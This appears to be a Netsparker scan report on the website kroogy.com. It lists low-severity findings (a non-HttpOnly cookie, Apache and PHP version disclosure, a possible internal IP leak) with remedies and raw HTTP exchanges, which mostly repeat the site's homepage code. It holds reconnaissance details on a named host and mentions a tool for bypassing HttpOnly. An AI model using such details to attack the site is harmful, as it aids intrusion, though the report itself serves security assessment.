<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Start Page</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" type="text/css" href="Colorful.css" /></head><body><h3 align="center">Please select a table to work with</h3> <table align="center" cellpadding="2" cellspacing="2"> <form action="login.php" method="post"> <tr><td>Username </td><td><input type="text" name="USERNAME"></td></tr> <tr><td>Password </td><td><input type="password" name="PASSWORD"></td></tr> <tr><td>&nbsp;</td><td><input type="submit" name="ACTION" value="Login"</td></tr> </form> </table>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /index.php

/index.php CONFIRMED

http://kroogy.com/index.php?languageid=

Identified Cookie

language

Request

GET /index.php?languageid= HTTP/1.1
Referer: http://kroogy.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:34:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Set-Cookie: language=deleted; expires=Sat, 24-Apr-2010 12:34:32 GMT
location: http://kroogy.com/
Content-Encoding:
Content-Length: 20
Connection: close
Content-Type: text/html


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://kroogy.com/

Extracted Version

2.2.3 (CentOS)

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:34:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:34:29 GMT; path=/
Content-Encoding:
Content-Length: 6794
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Kroogy Search - Home</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - Home"><meta name="keywords" content="Kroogy Search,search,search engine"><meta name="verify-v1" content="PfMtvMUHHRg/I3FReUjDYaCpVPX//TyFCNpEcX5oUmI=" /><meta name="google-site-verification" content="s-9hAp-e1y3Xh194fiMH_mKOz9iQuI_2HegHEPMUNcA" /><META name="y_key" content="8745226cb0eecb66"><meta name="alexaVerifyID" content="EgX0iKblGFHbJgQdSa7o1_zt_LE" /><meta name="msvalidate.01" content="D76ECAA58DEAA67C96FA2E277F200040" /><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style><style><!--/* CSS Document */

.body td, tr
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}

#countries,#optionallanguage,#themegroup
{
background-color:#e4f2fc;
height:22px;
border-width:1px;
border-style:solid;
Border-color:#aaaaaa;

}

.advancedsearchsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}
.advancedsearchtexttd
{
width:250px;
padding-left:5px;
height:40px;
padding-right:5px;

}
.advancedsearchfieldtd
{
padding-bottom:15px;
}
.advancedsearchtextstyle
{
font-size:12px;

}
.advancedsearchtable
{
width:700px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}
.advancedsearchexampletext
{
font-size:12px;
}

.advancedsearchtitletable
{
width:700px;
margin-top:20px;
background-color:#e1e1e1;
padding-top:15px;
padding-bottom:15px;
}
.advancedsearchtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.advancedsearchsubtitletext
{
font-size:12px;
font-weight:bold;
}

.footertable
{
width:100%;
padding-top:15px;


}
.footertext
{
font-size:12px;
}
.footertd
{
padding-left:10px;
}
.headerlinkstd
{
width:100%;

padding-right:5px;
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
}

.headerlinkstd a ,.headerlinkstd a:visited
{
color:#000000;
font-weight:bold;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;

}

.languagetd
{
padding-left:5px;
font-size:12px;
height:30px;
}
.headerlink
{
font-size:12px;
}
.themetd
{
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
color:#000;

}
.cloudtagtd
{
margin-top:20px;
padding-top:5px;
padding-left:5px;
border-color:#77c3fa;
border-width:1px;
border-style:solid;
padding-bottom:5px;

padding-left:5px;
padding-right:5px;

}

.cloudtagtd a
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.generallinks
{
font-size:12px;
}
.opendirectorytd
{
padding-top:10px;
}
.advancetd
{
height:20px;
padding-left:5px;
font-size:13px;
}

.footerlinktd
{
height:15px;
border-top: #045c97;
padding-top:5px;

border-top-style: solid;
border-top-width: 1px;
}
.stdpagetitle
{
font-size:14px;
font-weight:bold;

}
.emailafrndurltd , .emaillinkdesctd
{
padding-top;5px;
background-color:#e4f2fc;
padding-bottom:5px;
}
.emailafrndurl
{
font-size:12px;
font-weight:bold;
}
.outermainoptionstd
{
padding-left:15px;
padding-right:15px;
padding-top:5px;
padding-bottom:5px;
font-size:12px;
background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;

}
.outermainlogotd
{
width:5%;
padding-top:5px;
padding-bottom:5px;
padding-left:15px;
padding-right:15px;

background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
.outermaintabtd
{

padding-top:10px;
padding-bottom:5px;
padding-left:0px;
padding-right:0px;
vertical-align:bottom;


background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
#mandatory
{
color:red;
font-size:10px;
font-weight:bold;
vertical-align:top;
padding-left:2px;
padding-right:2px;
}
#morelanguagesdiv
{
font-size:11px;
}
.advancetd a
{

font-size:11px;

}



.generatesearchboxtable
{
width:900px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}


.generatesearchboxtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.generatesearchboxpagetitle
{
font-size:14px;
font-weight:bold;

}


.generatesearchboxtexttd
{

padding-left:5px;
height:40px;
padding-right:5px;

}
.generatesearchboxtextstyle
{
font-size:12px;

}


.generatesearchboxsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}

.generatesearchboxsubtitletext
{
font-size:12px;

font-weight:bold;


}


.generatesearchboxenginestextstyle
{
font-size:12px;
text-transform: capitalize;

}
--></style><SCRIPT LANGUAGE="JavaScript">function setFocus(){ document.searchform.search.focus();}function urlencode(str) {return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL) {day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script></head><body onload="setFocus()"><script type="text/javascript">function getkeyword(){var key=document.getElementById("search").value;}function dropdown_visible(){document.getElementById("optionallanguagediv").style.display="";document.getElementById("morelanguagesdiv").style.display="none";}function change_language(){var lang=document.getElementById('optionallanguage').value;window.location="index.php?languageid="+lang;}function change_country(){var country=document.getElementById('countries').value;window.location="index.php?regioncode="+country;}function theme_group(){var themevalue=document.getElementById('themegroup').value;window.location="index.php?themeid="+themevalue;}</script><table align="center" style="border-style:solid;border-color:#cccccc;border-width:0px" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2" height="30px">&nbsp;</td></tr><tr><td dir="ltr" style="valign-bottom;padding-bottom:5px;"><span><img src="userdata/homepagelogo.jpg" border="0"></span><span style="float:right;vertical-align: text-bottom"><select name="countries" id="countries" onChange="return change_country()"><option value="ww-ww" selected="selected" >World Wide</option><option value="XA-ar" >Arabia(Arabic)</option><option value="XA-en" >Arabia(English)</option><option value="AR-es" >Argentina</option><option value="AU-en" >Australia</option><option value="AT-de" >Austria</option><option value="BE-nl" >Belgium(Dutch)</option><option value="BE-fr" >Belgium(French)</option><option value="BR-pt" >Brazil</option><option value="BG-bg" >Bulgaria</option><option value="CA-en" >Canada(English)</option><option value="CA-fr" >Canada(French)</option><option value="CL-es" >Chile</option><option value="CN-zh" >China</option><option value="HR-hr" >Croatia</option><option value="CZ-cs" >Czech Republic</option><option value="DK-da" >Denmark</option><option value="EE-et" >Estonia</option><option value="FL-fi" >Finland</option><option value="FR-fr" >France</option><option value="DE-de" >Germany</option><option value="GR-el" >Greece</option><option value="HU-hu" >Hungary</option><option value="HK-zh" >Hong Kong SAR</option><option value="IN-en" >India</option><option value="ID-en" >Indonesia</option><option value="IE-en" >Ireland</option><option value="IL-he" >Israel</option><option value="IT-it" >Italy</option><option value="JP-ja" >Japan</option><option value="KR-ko" >korea</option><option value="XL-es" >Latin America</option><option value="LV-lv" >Latvia</option><option value="LT-lt" >Lithuania</option><option value="MY-en" >Malaysia</option><option value="MX-es" >Mexico</option><option value="NL-nl" >Netherlands</option><option value="NZ-en" >New Zealand</option><option value="NO-nl" >Norway</option><option value="PH-en" >Philippines</option><option value="PL-pl" >Poland</option><option value="PT-pt" >Portugal</option><option value="RO-ro" >Romania</option><option value="RU-ru" >Russia</option><option value="SG-en" >Singapore</option><option value="SK-sk" >Slovak Republic</option><option value="SL-sl" >Slovenia</option><option value="ZA-en" >South Africa</option><option value="ES-es" >Spain</option><option value="SE-sv" >Sweden</option><option value="CH-fr" >Switzerland(French)</option><option value="CH-de" >Switzerland (German)</option><option value="TW-zh" >Taiwan</option><option value="TH-th" >Thailand</option><option value="TR-tr" >Turkey</option><option value="UA-uk" >Ukraine</option><option value="GB-en" >United Kingdom</option><option value="US-en" >United States(English)</option><option value="US-es" >United States(Spanish)</option></select></span></td></tr><tr><td colspan="2" align="center"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css">.containertabtd
{

padding-left:10px;
background: url(images/themes/modern_blue/c2.gif)
no-repeat left top;

}

.tabsdiv
{

padding-right:10px;
background: url(images/themes/modern_blue/c3.gif)
no-repeat right top;

}

.tabsdivinner
{

background: url(images/themes/modern_blue/menu_bg.gif) repeat-x;

}

.tabstable
{
background: url(images/themes/..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

http://kroogy.com/

Extracted Version

PHP/5.1.6,PleskLin

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:34:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:34:29 GMT; path=/
Content-Encoding:
Content-Length: 6794
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Kroogy Search - Home</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - Home"><meta name="keywords" content="Kroogy Search,search,search engine"><meta name="verify-v1" content="PfMtvMUHHRg/I3FReUjDYaCpVPX//TyFCNpEcX5oUmI=" /><meta name="google-site-verification" content="s-9hAp-e1y3Xh194fiMH_mKOz9iQuI_2HegHEPMUNcA" /><META name="y_key" content="8745226cb0eecb66"><meta name="alexaVerifyID" content="EgX0iKblGFHbJgQdSa7o1_zt_LE" /><meta name="msvalidate.01" content="D76ECAA58DEAA67C96FA2E277F200040" /><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style><style><!--/* CSS Document */

.body td, tr
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}

#countries,#optionallanguage,#themegroup
{
background-color:#e4f2fc;
height:22px;
border-width:1px;
border-style:solid;
Border-color:#aaaaaa;

}

.advancedsearchsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}
.advancedsearchtexttd
{
width:250px;
padding-left:5px;
height:40px;
padding-right:5px;

}
.advancedsearchfieldtd
{
padding-bottom:15px;
}
.advancedsearchtextstyle
{
font-size:12px;

}
.advancedsearchtable
{
width:700px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}
.advancedsearchexampletext
{
font-size:12px;
}

.advancedsearchtitletable
{
width:700px;
margin-top:20px;
background-color:#e1e1e1;
padding-top:15px;
padding-bottom:15px;
}
.advancedsearchtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.advancedsearchsubtitletext
{
font-size:12px;
font-weight:bold;
}

.footertable
{
width:100%;
padding-top:15px;


}
.footertext
{
font-size:12px;
}
.footertd
{
padding-left:10px;
}
.headerlinkstd
{
width:100%;

padding-right:5px;
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
}

.headerlinkstd a ,.headerlinkstd a:visited
{
color:#000000;
font-weight:bold;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;

}

.languagetd
{
padding-left:5px;
font-size:12px;
height:30px;
}
.headerlink
{
font-size:12px;
}
.themetd
{
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
color:#000;

}
.cloudtagtd
{
margin-top:20px;
padding-top:5px;
padding-left:5px;
border-color:#77c3fa;
border-width:1px;
border-style:solid;
padding-bottom:5px;

padding-left:5px;
padding-right:5px;

}

.cloudtagtd a
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.generallinks
{
font-size:12px;
}
.opendirectorytd
{
padding-top:10px;
}
.advancetd
{
height:20px;
padding-left:5px;
font-size:13px;
}

.footerlinktd
{
height:15px;
border-top: #045c97;
padding-top:5px;

border-top-style: solid;
border-top-width: 1px;
}
.stdpagetitle
{
font-size:14px;
font-weight:bold;

}
.emailafrndurltd , .emaillinkdesctd
{
padding-top;5px;
background-color:#e4f2fc;
padding-bottom:5px;
}
.emailafrndurl
{
font-size:12px;
font-weight:bold;
}
.outermainoptionstd
{
padding-left:15px;
padding-right:15px;
padding-top:5px;
padding-bottom:5px;
font-size:12px;
background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;

}
.outermainlogotd
{
width:5%;
padding-top:5px;
padding-bottom:5px;
padding-left:15px;
padding-right:15px;

background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
.outermaintabtd
{

padding-top:10px;
padding-bottom:5px;
padding-left:0px;
padding-right:0px;
vertical-align:bottom;


background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
#mandatory
{
color:red;
font-size:10px;
font-weight:bold;
vertical-align:top;
padding-left:2px;
padding-right:2px;
}
#morelanguagesdiv
{
font-size:11px;
}
.advancetd a
{

font-size:11px;

}



.generatesearchboxtable
{
width:900px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}


.generatesearchboxtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.generatesearchboxpagetitle
{
font-size:14px;
font-weight:bold;

}


.generatesearchboxtexttd
{

padding-left:5px;
height:40px;
padding-right:5px;

}
.generatesearchboxtextstyle
{
font-size:12px;

}


.generatesearchboxsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}

.generatesearchboxsubtitletext
{
font-size:12px;

font-weight:bold;


}


.generatesearchboxenginestextstyle
{
font-size:12px;
text-transform: capitalize;

}
--></style><SCRIPT LANGUAGE="JavaScript">function setFocus(){ document.searchform.search.focus();}function urlencode(str) {return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL) {day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script></head><body onload="setFocus()"><script type="text/javascript">function getkeyword(){var key=document.getElementById("search").value;}function dropdown_visible(){document.getElementById("optionallanguagediv").style.display="";document.getElementById("morelanguagesdiv").style.display="none";}function change_language(){var lang=document.getElementById('optionallanguage').value;window.location="index.php?languageid="+lang;}function change_country(){var country=document.getElementById('countries').value;window.location="index.php?regioncode="+country;}function theme_group(){var themevalue=document.getElementById('themegroup').value;window.location="index.php?themeid="+themevalue;}</script><table align="center" style="border-style:solid;border-color:#cccccc;border-width:0px" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2" height="30px">&nbsp;</td></tr><tr><td dir="ltr" style="valign-bottom;padding-bottom:5px;"><span><img src="userdata/homepagelogo.jpg" border="0"></span><span style="float:right;vertical-align: text-bottom"><select name="countries" id="countries" onChange="return change_country()"><option value="ww-ww" selected="selected" >World Wide</option><option value="XA-ar" >Arabia(Arabic)</option><option value="XA-en" >Arabia(English)</option><option value="AR-es" >Argentina</option><option value="AU-en" >Australia</option><option value="AT-de" >Austria</option><option value="BE-nl" >Belgium(Dutch)</option><option value="BE-fr" >Belgium(French)</option><option value="BR-pt" >Brazil</option><option value="BG-bg" >Bulgaria</option><option value="CA-en" >Canada(English)</option><option value="CA-fr" >Canada(French)</option><option value="CL-es" >Chile</option><option value="CN-zh" >China</option><option value="HR-hr" >Croatia</option><option value="CZ-cs" >Czech Republic</option><option value="DK-da" >Denmark</option><option value="EE-et" >Estonia</option><option value="FL-fi" >Finland</option><option value="FR-fr" >France</option><option value="DE-de" >Germany</option><option value="GR-el" >Greece</option><option value="HU-hu" >Hungary</option><option value="HK-zh" >Hong Kong SAR</option><option value="IN-en" >India</option><option value="ID-en" >Indonesia</option><option value="IE-en" >Ireland</option><option value="IL-he" >Israel</option><option value="IT-it" >Italy</option><option value="JP-ja" >Japan</option><option value="KR-ko" >korea</option><option value="XL-es" >Latin America</option><option value="LV-lv" >Latvia</option><option value="LT-lt" >Lithuania</option><option value="MY-en" >Malaysia</option><option value="MX-es" >Mexico</option><option value="NL-nl" >Netherlands</option><option value="NZ-en" >New Zealand</option><option value="NO-nl" >Norway</option><option value="PH-en" >Philippines</option><option value="PL-pl" >Poland</option><option value="PT-pt" >Portugal</option><option value="RO-ro" >Romania</option><option value="RU-ru" >Russia</option><option value="SG-en" >Singapore</option><option value="SK-sk" >Slovak Republic</option><option value="SL-sl" >Slovenia</option><option value="ZA-en" >South Africa</option><option value="ES-es" >Spain</option><option value="SE-sv" >Sweden</option><option value="CH-fr" >Switzerland(French)</option><option value="CH-de" >Switzerland (German)</option><option value="TW-zh" >Taiwan</option><option value="TH-th" >Thailand</option><option value="TR-tr" >Turkey</option><option value="UA-uk" >Ukraine</option><option value="GB-en" >United Kingdom</option><option value="US-en" >United States(English)</option><option value="US-es" >United States(Spanish)</option></select></span></td></tr><tr><td colspan="2" align="center"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css">.containertabtd
{

padding-left:10px;
background: url(images/themes/modern_blue/c2.gif)
no-repeat left top;

}

.tabsdiv
{

padding-right:10px;
background: url(images/themes/modern_blue/c3.gif)
no-repeat right top;

}

.tabsdivinner
{

background: url(images/themes/modern_blue/menu_bg.gif) repeat-x;

}

.tabstable
{
background: url(images/themes/..
[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

